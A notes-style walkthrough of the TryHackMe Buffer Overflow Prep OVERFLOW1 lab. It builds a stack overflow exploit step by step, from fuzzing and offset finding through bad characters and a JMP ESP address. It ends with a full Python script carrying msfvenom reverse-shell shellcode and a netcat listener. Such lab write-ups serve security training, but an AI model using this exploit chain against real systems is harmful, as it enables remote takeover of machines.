Buffer Overflow Prep - OVERFLOW1 - TryHackMe

This is a write-up for the Buffer Overflow Prep room by Tib3rius on TryHackMe, in a notes-style format.


Useful Links
===========

https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
https://tryhackme.com/room/bufferoverflowprep


Fuzzing with long input Strings
=========================
⇒ python3 -c 'print ("A" * 5000)' ⇒ Generate lots of A's
⇒ Run oscp.exe in Immunity Debugger on the target
⇒ Connect with netcat and send these A's to the target: OVERFLOW1 AAAA.... (5000 times)
⇒ oscp.exe crashes, which indicates the input overflows a buffer and we can exploit this with a buffer overflow.

MSF Pattern create
================
⇒ msf-pattern_create -l 5000
⇒ Send the pattern over to the target exe via the nc session only.

Mona Config
===========
⇒ !mona config -set workingfolder c:\mona\%p    ⇒ Run this in Immunity

Finding Offset
===========
⇒ In Immunity Debugger note the EIP after sending the pattern and crashing the exe.
    

⇒ msf-pattern_offset -l 5000 -q 6F43396E <====EIP

    Offset is at 1978.

⇒ Fuzz again with 1978 A's and 4 B's
    • python3 -c 'print ("A" * 1978 + "B" * 4)'

    • So we see EIP is filled with four B's. We found the exact sweet spot.

⇒ Python 3 script to test the same:
    import socket
    import sys

    message = b"OVERFLOW1 "  # Notice the space at the end
    payload = message + b"A" * 1978 + b"B" * 4  # 1978 bytes reach EIP, the 4 B's land in it

    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.10.194.7', 1337))
        s.recv(1024)  # read the banner
        s.send(payload + b'\r\n')
        s.recv(1024)
        s.close()  # close() has to be called, not just referenced
    except OSError:
        print("Cannot connect to server")
        sys.exit()
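To see why the EIP value 6F43396E maps to offset 1978, here is an added Python reimplementation of the msf-pattern_create / msf-pattern_offset logic, plus the little-endian packing used for the return address later in these notes. It is example code written for this write-up, not part of the room or of the Metasploit tools, and assumes the standard Aa0Aa1...Zz9 cyclic pattern.

```python
import string
import struct


def pattern_create(length):
    """Rebuild the msf-pattern_create cyclic pattern (Aa0Aa1...Zz9) to `length` bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip, length=5000):
    """Return the offset of the 4 pattern bytes that ended up in EIP, or -1.

    x86 is little-endian, so EIP = 0x6F43396E means the bytes 6E 39 43 6F
    ("n9Co") were sitting in memory at the overwritten return address.
    """
    needle = struct.pack("<I", eip)
    return pattern_create(length).find(needle)


def little_endian(addr):
    """Pack a 32-bit address the way it must appear in the payload (0x625011af -> \\xaf\\x11\\x50\\x62)."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    print("offset:", pattern_offset(0x6F43396E))
    print("ret bytes:", little_endian(0x625011AF))
```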

Finding Bad Characters
===================
⇒ !mona bytearray -b "\x00" ⇒ Run this in Immunity to generate badchars byte array
⇒ https://github.com/mrinalpande/scripts/blob/master/python/badchars can also be used for bad chars
    • Updated script

    import socket 
    import sys
    message = b"OVERFLOW1 " #Notice the space in the end

    badchars = ( b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
                         b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
                         b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
                         b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
                         b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
                         b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
                         b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
                         b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
                         b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
                         b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
                         b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
                         b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
                         b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
                         b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
                         b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
                         b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

    payload = message + b"A" * 1978 + b"B" * 4 + badchars  # Bad chars at the end, so they land at ESP

    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.10.194.7', 1337))
        s.recv(1024)
        s.send(payload + b'\r\n')
        s.recv(1024)
        s.close()
    except OSError:
        print("Cannot connect to server")
        sys.exit()

• In Immunity Debugger, right-click ESP and choose "Follow in Dump", then look for any character that is missing or altered compared to what the above script sent.
    

• So the bad chars in this example are \x00\x07\x2e\xa0 (the dump shows \x00\x07\x08\x2e\x2f\xa0\xa1 corrupted; remember that a bad char can affect the next byte as well).
• Mona can also be used to find bad chars; run this in Immunity:
    ◇  !mona compare -f C:\mona\oscp\bytearray.bin -a 019DFA30 (<==ESP)
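An added example (not from the room or from mona) that reproduces what !mona bytearray and !mona compare do: build the byte array minus the known bad chars, diff it against what landed at ESP, and collapse each run of corrupted bytes to its first byte, since a bad char can mangle the byte after it. The memory dump here is constructed to mimic the three bad chars found above; the real dump comes from the debugger.

```python
def badchar_array(exclude=b"\x00"):
    """Every byte value 0x00-0xff minus the ones already known to be bad
    (same idea as: !mona bytearray -b "\\x00")."""
    return bytes(b for b in range(256) if b not in exclude)


def compare_dump(sent, dumped):
    """Walk the bytes we sent next to what landed at ESP and return the
    offsets where they differ (this is what !mona compare reports)."""
    return [i for i, (a, b) in enumerate(zip(sent, dumped)) if a != b]


def first_of_each_run(sent, mismatches):
    """Collapse consecutive mismatch offsets to the first byte of each run.
    Only that first byte is treated as bad; the following byte is usually
    collateral damage. Remove it, regenerate, resend and repeat until the
    dump matches."""
    seen = set(mismatches)
    firsts = [i for i in mismatches if i - 1 not in seen]
    return bytes(sent[i] for i in firsts)


# Constructed sample dump: pretend the target mangled \x07 (and the \x08
# after it), \x2e (and \x2f) and \xa0 (and \xa1), as in the write-up.
SENT = badchar_array(b"\x00")


def simulate_dump(sent):
    out = bytearray(sent)
    for bad in (0x07, 0x2E, 0xA0):
        i = sent.index(bad)
        out[i] = 0x00      # the bad byte itself is dropped/mangled
        out[i + 1] = 0xFF  # and the byte after it is altered too
    return bytes(out)


if __name__ == "__main__":
    diffs = compare_dump(SENT, simulate_dump(SENT))
    print("corrupted offsets:", diffs)
    print("likely bad chars:", first_of_each_run(SENT, diffs))
```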


Finding Jump Point
===============
⇒ First find the protections etc. of the loaded modules using Mona
    • !mona modules

• Look for modules showing "False" across all the protection columns
• 2 in this case: essfunc.dll and oscp.exe
• Target the dll first to find the jump point

⇒ Finding Jump point ⇒ Return address to jump to, to execute the shellcode
    • !mona find -s "\xff\xe4" -m essfunc #JMP ESP

• Go from top to bottom, pick the first one
• Take the address from the first jump
• 0x625011af ⇒ Write it in reverse byte order (little-endian)
    • \xaf\x11\x50\x62
• Other method using mona only:
    ◇ !mona jmp -r esp -cpb "\x00\x07\x2e\xa0" (⇐ Bad chars)
        ▪ Take the address from the output and put that in reverse byte order as shown above.
• Update the script as:
    import socket
    import sys

    message = b"OVERFLOW1 "  # Notice the space at the end
    ret = b"\xaf\x11\x50\x62"  # JMP ESP address in little-endian, replaces the B's which were at EIP
    payload = message + b"A" * 1978 + ret

    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.10.194.7', 1337))
        s.recv(1024)
        s.send(payload + b'\r\n')
        s.recv(1024)
        s.close()
    except OSError:
        print("Cannot connect to server")
        sys.exit()

• Set a breakpoint at 0x625011af after opening the exe in Immunity.

• Use F2 to set the BP and run the program.

• Run the above exploit script
  We hit the breakpoint and EIP is pointing to our jump point 0x625011af, which is what we wanted.
 
Generate Shell Code
================
⇒ msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=9999 EXITFUNC=thread -b "\x00" -f py
⇒ msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=9999 EXITFUNC=thread -b "\x00" -f c
    • -p = payload
    • LHOST = our local ip
    • LPORT = our local port to get shell back
    • -b = Bad characters to avoid
    • -f = Output format e.g. C or Python

⇒ In our case, let's use the following:
    • msfvenom -p windows/shell_reverse_tcp LHOST=10.8.98.192 LPORT=9999 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c
    • [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
        [-] No arch selected, selecting arch: x86 from the payload
        Found 11 compatible encoders
        Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
        x86/shikata_ga_nai succeeded with size 351 (iteration=0)
        x86/shikata_ga_nai chosen with final size 351
        Payload size: 351 bytes
        Final size of c file: 1500 bytes
        unsigned char buf[] =
        "\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
        "\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
        "\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
        "\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
        "\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
        "\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
        "\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
        "\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
        "\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
        "\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
        "\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
        "\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
        "\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
        "\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
        "\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
        "\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
        "\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
        "\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
        "\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
        "\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
        "\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
        "\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
        "\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
        "\x74\x5b\xad\x98\x75\x4e";

⇒ Our Script will become:
    import socket
    import sys

    message = b"OVERFLOW1 " #Notice the space in the end

    shell_code = (b"\xda\xc6\xb8\x92\xf3\x5c\x06\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
                           b"\x52\x83\xc3\x04\x31\x43\x13\x03\xd1\xe0\xbe\xf3\x29\xee\xbd"
                           b"\xfc\xd1\xef\xa1\x75\x34\xde\xe1\xe2\x3d\x71\xd2\x61\x13\x7e"
                           b"\x99\x24\x87\xf5\xef\xe0\xa8\xbe\x5a\xd7\x87\x3f\xf6\x2b\x86"
                           b"\xc3\x05\x78\x68\xfd\xc5\x8d\x69\x3a\x3b\x7f\x3b\x93\x37\xd2"
                           b"\xab\x90\x02\xef\x40\xea\x83\x77\xb5\xbb\xa2\x56\x68\xb7\xfc"
                           b"\x78\x8b\x14\x75\x31\x93\x79\xb0\x8b\x28\x49\x4e\x0a\xf8\x83"
                           b"\xaf\xa1\xc5\x2b\x42\xbb\x02\x8b\xbd\xce\x7a\xef\x40\xc9\xb9"
                           b"\x8d\x9e\x5c\x59\x35\x54\xc6\x85\xc7\xb9\x91\x4e\xcb\x76\xd5"
                           b"\x08\xc8\x89\x3a\x23\xf4\x02\xbd\xe3\x7c\x50\x9a\x27\x24\x02"
                           b"\x83\x7e\x80\xe5\xbc\x60\x6b\x59\x19\xeb\x86\x8e\x10\xb6\xce"
                           b"\x63\x19\x48\x0f\xec\x2a\x3b\x3d\xb3\x80\xd3\x0d\x3c\x0f\x24"
                           b"\x71\x17\xf7\xba\x8c\x98\x08\x93\x4a\xcc\x58\x8b\x7b\x6d\x33"
                           b"\x4b\x83\xb8\x94\x1b\x2b\x13\x55\xcb\x8b\xc3\x3d\x01\x04\x3b"
                           b"\x5d\x2a\xce\x54\xf4\xd1\x99\x50\x01\xbb\x99\x0d\x13\x3b\x3d"
                           b"\xc1\x9a\xdd\x2b\xcd\xca\x76\xc4\x74\x57\x0c\x75\x78\x4d\x69"
                           b"\xb5\xf2\x62\x8e\x78\xf3\x0f\x9c\xed\xf3\x45\xfe\xb8\x0c\x70"
                           b"\x96\x27\x9e\x1f\x66\x21\x83\xb7\x31\x66\x75\xce\xd7\x9a\x2c"
                           b"\x78\xc5\x66\xa8\x43\x4d\xbd\x09\x4d\x4c\x30\x35\x69\x5e\x8c"
                           b"\xb6\x35\x0a\x40\xe1\xe3\xe4\x26\x5b\x42\x5e\xf1\x30\x0c\x36"
                           b"\x84\x7a\x8f\x40\x89\x56\x79\xac\x38\x0f\x3c\xd3\xf5\xc7\xc8"
                           b"\xac\xeb\x77\x36\x67\xa8\x98\xd5\xad\xc5\x30\x40\x24\x64\x5d"
                           b"\x73\x93\xab\x58\xf0\x11\x54\x9f\xe8\x50\x51\xdb\xae\x89\x2b"
                           b"\x74\x5b\xad\x98\x75\x4e")

    ret = b"\xaf\x11\x50\x62"  # JMP ESP address in little-endian, replaces the B's which were at EIP

    payload = message + b"A" * 1978 + ret + b"\x90" * 32  # 32 NOPs (\x90) between the jump and the shellcode

    try:
        print("Sending payload...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.10.194.7', 1337))
        s.recv(1024)
        s.send(payload + shell_code + b'\r\n')
        s.recv(1024)
        s.close()
    except OSError:
        print("Cannot connect to server")
        sys.exit()

    • The total payload which we are sending is "OVERFLOW1 " + A's + JUMP ADDR + NOPs + REVERSE SHELL CODE + \r\n

    • Start a netcat listener ⇒ nc -nlvp 9999

    • Run the exploit after running the exe on the target and we get the reverse shell :)
